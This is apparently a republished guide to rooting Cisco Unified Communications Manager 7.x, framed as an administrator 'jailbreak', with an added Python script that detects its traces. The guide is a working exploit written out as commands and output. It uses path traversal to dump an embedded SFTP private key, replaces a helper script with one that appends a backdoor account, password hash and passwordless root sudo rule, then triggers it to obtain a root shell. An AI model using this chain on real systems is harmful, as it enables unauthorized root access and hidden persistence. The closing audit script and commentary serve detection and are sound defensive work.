Gaining access to closed phone platforms in order to exercise the rights the paying customer actually has on the device has become a necessary exercise lately. Very capable people perform this public service for certain consumer devices on the market. Unfortunately, the trend of sealing the operating system off from the legitimate administrator has found its way into enterprise phone solutions as well. Therefore, it becomes necessary to provide jail-breaking guides for those platforms too, in order to allow the administrator to fix or adjust things on these platforms that the vendor did not implement to the customer's satisfaction.
The Cisco Unified Communications Manager, or CUCM, is such a closed platform. While the system's design separates the administration user of the web interface, which controls the VoIP-specific functionality, from the operating system administrator, the latter is confined to an IOS-like command line shell written in Java. This shell only offers a very small set of commands, barely sufficient to manage the appliance's functionality. The underlying operating system, a Red Hat Enterprise Linux AS release 4 (Nahant Update 4) in the case of CUCM 7.x, obviously offers a significantly broader spectrum of setup and administration choices. For example, it might be desirable to modify the iptables configuration in order to protect some of Cisco's less well-implemented services from the casual attacker.
WARNING: The following information is provided as-is, for educational purposes only. Using this information against actual Cisco products may void your warranty, may not be legal and may cause you trouble and other unwanted effects. We neither recommend nor encourage any activity that is not compliant with laws and license agreements you may have. This guide is only provided for testing in lab environments.
So, without further ado, here we present one way to gain root access on a CUCM, provided a legitimate operating system administrator account is available:
admin:file dump sftpdetails ../.ssh/id_dsa
-----BEGIN DSA PRIVATE KEY-----
MIIBvQIBAAKBgQDD4rRO0aI3VTsEYIo48zHDipw7AXR+QmEVsSevdtNNMmWbFeHl
6aQF7VzwoLzfa1eVpXwGCbk7m1/u7wY/mJNsrClNaPWfa0MbNFPdOI0o4IUA+LNO
+6GNbDbWMPAdiuV0S/fyg7wUc2DcKTZX6mQuWbGaGbLk2bN1RxkVzqi4vQIVAJaq
saqLZ10dIsbfk04LaOgxgkZBAoGBAKGquSl92E/ZMmQI/SzhPO9p0uyfhZR8uR2M
a3R60EP1HyTg+DO6M8REzOSm1PTWpvr0XFAQULfxGZQyjcARIYPmmBSrqz7ETS3y
bmZcJ19a38H1L2EUuOCO8A3q70NK2DMPoYBf6JV+b77shpz7aE+1Xd0rL3Tyqtzj
JOFsyxkSAoGBAKmWRxB/pwGtu1eFc5Eb5xCRmVB7JP9xDpqW/DIz2LTxoZBSMRcJ
5UdZ7ewVGIXYOjKvcR/ua3n6UBa0wBmYuHJ5erjpAHoR0JUjfpz9ONiX47OAKDav
fLD2lIqnxzUz+QmHUVRiwcjd2AZhyzfChS40/9tKbBaqC2QYki7NKyfzAhUAhuPE
PSfhcQWR3rOKaYUD85henvE=
-----END DSA PRIVATE KEY-----

C:\>copy con c:\temp\id.ots
-----BEGIN DSA PRIVATE KEY-----
MIIBvQIBAAKBgQDD4rRO0aI3VTsEYIo48zHDipw7AXR+QmEVsSevdtNNMmWbFeHl
6aQF7VzwoLzfa1eVpXwGCbk7m1/u7wY/mJNsrClNaPWfa0MbNFPdOI0o4IUA+LNO
+6GNbDbWMPAdiuV0S/fyg7wUc2DcKTZX6mQuWbGaGbLk2bN1RxkVzqi4vQIVAJaq
saqLZ10dIsbfk04LaOgxgkZBAoGBAKGquSl92E/ZMmQI/SzhPO9p0uyfhZR8uR2M
a3R60EP1HyTg+DO6M8REzOSm1PTWpvr0XFAQULfxGZQyjcARIYPmmBSrqz7ETS3y
bmZcJ19a38H1L2EUuOCO8A3q70NK2DMPoYBf6JV+b77shpz7aE+1Xd0rL3Tyqtzj
JOFsyxkSAoGBAKmWRxB/pwGtu1eFc5Eb5xCRmVB7JP9xDpqW/DIz2LTxoZBSMRcJ
5UdZ7ewVGIXYOjKvcR/ua3n6UBa0wBmYuHJ5erjpAHoR0JUjfpz9ONiX47OAKDav
fLD2lIqnxzUz+QmHUVRiwcjd2AZhyzfChS40/9tKbBaqC2QYki7NKyfzAhUAhuPE
PSfhcQWR3rOKaYUD85henvE=
-----END DSA PRIVATE KEY-----
^Z
        1 file(s) copied.

C:\>puttygen c:\TEMP\id.ots

Save the private key (with or without passphrase) to another file, e.g. c:\temp\id.ppk.

C:\>psftp -2 -i c:\TEMP\id.ppk sftpuser@cucm.example.com
Using username "sftpuser".
Remote working directory is /home/sftpuser
psftp>

psftp> get sftp_connect.sh
remote:/home/sftpuser/sftp_connect.sh => local:sftp_connect.sh
psftp> exit

chattr -i /etc/passwd
chattr -i /etc/shadow
echo 'jail:x:1337:1337::/tmp:/bin/bash' >> /etc/passwd
echo 'jail:$1$knkuI5HP$sNn3SJJ/95E.9iD.vvnyw.:14714:1:99999:7:::' >> /etc/shadow
echo 'jail ALL=(root) NOPASSWD: /bin/bash' >> /etc/sudoers
chattr +i /etc/passwd
chattr +i /etc/shadow

C:\TEMP\>psftp -2 -i c:\TEMP\id.ppk sftpuser@cucm.example.com
Using username "sftpuser".
Remote working directory is /home/sftpuser
psftp> del sftp_connect.sh
rm /home/sftpuser/sftp_connect.sh: OK
psftp> put sftp_connect.sh
local:sftp_connect.sh => remote:/home/sftpuser/sftp_connect.sh
psftp> chmod 555 sftp_connect.sh
/home/sftpuser/sftp_connect.sh: 0644 -> 0555
psftp> exit

admin:file get tftp os7920.txt
Please wait while the system is gathering files info ...done.
Sub-directories were not traversed.
Number of files affected: 1
Total size in Bytes: 22
Total size in Kbytes: 0.021484375
Would you like to proceed [y/n]? y
SFTP server IP: doesNotMatter
SFTP server port [22]:
User ID: SoonToBeRoot
Password: ***
Download directory: InYourFace
Could not connect to host doesNotMatter on port 22. Please verify SFTP settings.
admin:

login as: jail
jail@cucm.example.com's password:
-bash-3.00$ sudo /bin/bash
bash-3.00# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
bash-3.00#
This procedure was brought to you by Sandro Gauci of EnableSecurity and Felix 'FX' Lindner of Recurity Labs.
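For the administrator on the other side of this procedure, the useful question is how to tell whether an appliance has already been modified this way. The following Python script is an added example, not part of the original post and not code from EnableSecurity or Recurity Labs. It audits passwd, shadow and sudoers content plus the sftp_connect.sh helper for exactly the traces the procedure above leaves behind: a local account outside the expected baseline, a login-shell account homed in a scratch directory, an extra UID 0 account, a NOPASSWD sudoers line that hands out a shell as root, and a helper script whose hash no longer matches a known-good copy. The sample file contents, the baseline account list and the reference script are constructed assumptions; a real audit would read the files from a backup, a disk image or the live system and compare them against your own known-good baseline.

```python
"""Audit account and sudo configuration for the persistence pattern shown above.

Added example (not part of the original post). The sample contents, the
baseline account list and the reference helper script are constructed
assumptions; replace them with data from your own known-good appliance.
"""
import hashlib
import re

# Constructed samples modelled on the entries shown in the post (assumption:
# a real audit reads these from a backup, a disk image or the live files).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
sftpuser:x:501:501::/home/sftpuser:/bin/bash
jail:x:1337:1337::/tmp:/bin/bash
"""
SAMPLE_SHADOW = """root:$1$placehold$xxxxxxxxxxxxxxxxxxxxxx:14000:0:99999:7:::
bin:*:14000:0:99999:7:::
sftpuser:$1$placehold$yyyyyyyyyyyyyyyyyyyyyy:14000:0:99999:7:::
jail:$1$knkuI5HP$sNn3SJJ/95E.9iD.vvnyw.:14714:1:99999:7:::
"""
SAMPLE_SUDOERS = """Defaults    requiretty
root    ALL=(ALL) ALL
jail ALL=(root) NOPASSWD: /bin/bash
"""
# Hypothetical known-good helper script and a copy with extra lines appended.
ORIGINAL_SFTP_SCRIPT = b"#!/bin/sh\n# placeholder for the vendor's sftp_connect.sh\nexit 0\n"
BASELINE_SHA256 = hashlib.sha256(ORIGINAL_SFTP_SCRIPT).hexdigest()
TAMPERED_SFTP_SCRIPT = ORIGINAL_SFTP_SCRIPT + b"chattr -i /etc/passwd\n"

# Hypothetical baseline: local accounts expected on an untouched appliance.
BASELINE_ACCOUNTS = {"root", "bin", "sftpuser"}
LOGIN_SHELLS = {"/bin/bash", "/bin/sh", "/bin/ksh", "/bin/zsh", "/bin/dash"}
SCRATCH_HOMES = ("/tmp", "/var/tmp", "/dev/shm")
SUDO_RE = re.compile(
    r"^(?P<user>\S+)\s+\S+=\((?P<runas>[^)]*)\)\s*NOPASSWD:\s*(?P<cmds>.+)$")

def parse_passwd(text):
    """Return {user: (uid, gid, home, shell)} from passwd-format text."""
    users = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and not line.startswith("#"):
            users[fields[0]] = (int(fields[2]), int(fields[3]), fields[5], fields[6])
    return users

def shadow_users(text):
    """Account names present in shadow-format text."""
    return {line.split(":")[0] for line in text.splitlines() if ":" in line}

def find_unexpected_accounts(passwd_text, shadow_text, baseline=BASELINE_ACCOUNTS):
    """Accounts in passwd or shadow that are not in the baseline."""
    present = set(parse_passwd(passwd_text)) | shadow_users(shadow_text)
    return sorted(present - set(baseline))

def find_uid0_aliases(passwd_text):
    """Accounts other than root that carry UID 0."""
    return sorted(user for user, (uid, _, _, _) in parse_passwd(passwd_text).items()
                  if uid == 0 and user != "root")

def find_scratch_home_logins(passwd_text):
    """Login-shell accounts whose home is a scratch directory such as /tmp."""
    return sorted(user for user, (_, _, home, shell) in parse_passwd(passwd_text).items()
                  if shell in LOGIN_SHELLS and home.startswith(SCRATCH_HOMES))

def find_nopasswd_shell_grants(sudoers_text):
    """sudoers entries granting a shell (or ALL) as root without a password."""
    hits = []
    for line in sudoers_text.splitlines():
        match = SUDO_RE.match(line.strip())
        if not match:
            continue
        runas = match.group("runas").split(":")[0]          # "ALL:ALL" -> "ALL"
        cmds = [c.strip() for c in match.group("cmds").split(",")]
        if runas in ("root", "ALL", "") and any(
                c == "ALL" or (c.split() or [""])[0] in LOGIN_SHELLS for c in cmds):
            hits.append((match.group("user"), cmds))
    return hits

def file_matches_baseline(content, expected_sha256):
    """True when the helper script still hashes to the known-good value."""
    return hashlib.sha256(content).hexdigest() == expected_sha256

def audit(passwd_text, shadow_text, sudoers_text, helper_content, helper_sha256):
    """Run every check and return the findings keyed by check name."""
    return {
        "unexpected_accounts": find_unexpected_accounts(passwd_text, shadow_text),
        "uid0_aliases": find_uid0_aliases(passwd_text),
        "scratch_home_logins": find_scratch_home_logins(passwd_text),
        "nopasswd_shell_grants": find_nopasswd_shell_grants(sudoers_text),
        "helper_script_intact": file_matches_baseline(helper_content, helper_sha256),
    }

if __name__ == "__main__":
    findings = audit(SAMPLE_PASSWD, SAMPLE_SHADOW, SAMPLE_SUDOERS,
                     TAMPERED_SFTP_SCRIPT, BASELINE_SHA256)
    for name, finding in findings.items():
        print(f"{name}: {finding}")
```

Note that the payload above re-applies the immutable attribute with chattr +i after editing, so the attribute being set is no evidence that /etc/passwd and /etc/shadow are untouched; the check has to compare content against a baseline, as the script does. The same applies to the helper script: it is restored to mode 0555 after the upload, so a permission check alone would pass, while a hash comparison against a known-good copy does not.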